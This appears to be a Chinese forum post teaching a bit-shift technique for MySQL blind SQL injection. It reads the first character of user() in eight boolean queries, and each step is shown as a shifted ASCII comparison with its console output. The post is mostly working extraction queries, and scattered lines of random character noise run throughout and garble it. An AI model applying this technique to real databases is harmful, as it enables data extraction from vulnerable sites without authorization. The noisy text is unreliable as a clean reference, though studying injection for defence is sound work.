关于通过对8bit的ascii做右位移提高mysql盲注效率

admin

通过这种方法我们只需要做8次select来确定一个键值的第一位或第n位
! A# r' W( i8 n' x; J2 F% j
) Z. N  n1 `' ~! I+ p, Q) ^
0 S1 f) U2 A2 z( L/ B0 }) ~& F  ^
下面将以查询mysql数据库当中user()的第一位为例:

8 V9 x; X# L" P7 @4 u' b
" w, b; n# K# w. Y- g/ @5 O
# Q* Z! w5 @( z2 |- d& hps:第二位,第三位依次类推 select substr(user(),2,1) mysql> select substr(user(),3,1)


& B( Q" v  N; ~9 q4 ^! B
首先执行如下sql语句:
( ?8 Q! V8 `$ X- r8 J


: t0 D4 v( |# V0 q( q, U1 `" g5 Rmysql> select (ascii((substr(user(),1,1))) >> 7)=0;
; }5 W5 |" L- Z; n


+ e6 p, O. U* D5 e; J9 G7 q7 \- @/ V我们将对这个8bit的ascii也就是user()的第一位做7次右偏移,也就是偏移到8bit的ascii的
1 x; ~0 o* _. ~( C% q8 e9 e' |# _( j


- U& p' v7 x# a3 H第一位并与0做等运算,如果,运算结果为0 说明第一位不为0,也就为1


$ [- S1 v9 b% h) j0 X4 G
如果运算结果为1,说明第一位为0,不为1
, W1 M# a& C# t, w  A# P- c3 ~7 B


" {7 `% ~- l, O+————————————–+

| (ascii((substr(user(),1,1))) >> 7)=0 |
, ]9 Q  i7 F0 |4 L* F
2 }% m9 x3 o; `* R. w3 @3 O- g7 a1 ^+————————————–+
: j9 Y! b+ D6 v, g* |* h
  y* O# b( ?) Q| 1 |

) g+ V0 g9 e! G% r) W: r+————————————–+
' P* P: e) o3 s8 E
& M: P% W; f/ u$ e4 n2 r1 row in set (0.00 sec)
8 d+ g" `5 |5 H- s- B! T6 G. t
4 J0 H  F; C) v2 `) V这样我们就确定这个8bit的ascii的第一位为0


# x/ v( Z3 a, p1 o
5 q1 n+ U; f/ a, s' {0 y+ n$ }第二次我们来做6次右偏移来确定前两位

7 h9 C1 t; G! t; k7 l

% W3 T  K8 ~" I9 \% C9 x前两位可能是01或00,即依然可以与0做比较,
& S. h& _! t, a) v9 V# _
: Y6 P9 Q( D$ i. f0 t2 u; e8 Mmysql> select (ascii((substr(user(),1,1))) >> 6)=0;

* x( H, d: m4 g' w4 ~  m5 y" o+————————————–+
0 N: d1 Z# S& c0 c6 Y, w2 `
- k$ ?4 ]3 t8 K% M# `| (ascii((substr(user(),1,1))) >> 6)=0 |
2 x& S- j7 B0 f% I' m6 F* ^
+————————————–+

8 ?' j+ K+ s7 y( g7 l| 0 |
5 M! t& b: X: W
0 D7 I. |3 @& L3 v9 F3 }+————————————–+

1 row in set (0.00 sec)


8 \5 E0 S2 c6 q. `4 D
7 f5 ]8 t. W8 c9 D- R结果为0,即第二位为1
- p2 u8 N: J" \
. S7 ~6 L  f' G" [* O; ?5 I! g, H

开始猜测前三位为010或011


- B/ q1 l8 @  b6 n, O7 I
/ T# T$ }- E7 ^& V* J+ Y! g3 h让我们看看010和011的ascii码是多少
. E* k8 N4 H4 S  w! c
, H5 @5 t: n/ j- W* Y

分别查询select b’011′ select b’010′
0 F7 ?- Y5 |* q, Z! I" P
2 s/ R2 D5 A- o( Z3 F
# \, l" a' O2 Z7 j9 i% w
获得结果 010 = 2 011 = 3

; h4 C: I, X4 k' P. P
/ X9 C) w6 m1 Z" ^, n( M
, {/ x( P( F, p, G, L# i执行如下sql:

$ G% i! G( h1 @3 ~1 H

" h) ~% h/ n, @- Y& ]) Mmysql> select (ascii((substr(user(),1,1))) >> 5)=2;
1 y) p" U  |/ d- E6 d" M- `5 z- p
3 R5 V! N' b, ]  V6 Y& j7 X+————————————–+
- |: _6 \8 p, `9 w5 [
| (ascii((substr(user(),1,1))) >> 5)=2 |
4 A7 O2 l* d: i' L
+————————————–+
' L/ \! t$ e) \6 z3 _" W8 @
| 0 |
: `8 m; t+ e/ I4 [
5 p; ^. s' |1 G+————————————–+
7 N& i$ Z6 F6 k& z% [
6 }. G4 h& T1 u; N; m即前三位不为010,而是011

/ ^; [& z$ v" K7 a. h
, `% p6 _/ }$ u' n9 }' L+ V
6 n) l& U- a5 d! [) ^( ]% m* f直到获得最后一位
, }8 W9 |5 \" {3 W1 B
7 G8 i) [+ C8 U- D
) a1 S  Z/ ]% M' l& M( b
最终结果为:01110010

( V- y$ ~  ?+ D8 ?
5 n! H$ ]5 V; C& H9 j5 {
转换一下:



select b’01110010′


9 @6 W5 ?+ _1 |  r; @4 c2 H
- o7 d+ X8 J  w$ T/ B查询结果
, E# }; I6 w# _8 {
* |# O9 D- E3 c9 E2 E8 ]
* k' J7 g0 e0 g0 O( T# M7 m$ t
+————-+

| b’01110010′ |
9 B) h( Q( Y3 F; w* V7 e. n
4 O7 U8 `9 m8 \+————-+

| r |

+————-+
  ~1 o4 T3 L1 g$ ]7 _- \5 L6 ~
" H' m* t2 d2 ^1 row in set (0.00 sec)
/ C. D1 f* u2 J( D8 d4 ^
! z7 Q  K" K- o

这样我们就获得了user()的第一位.其它位依此类推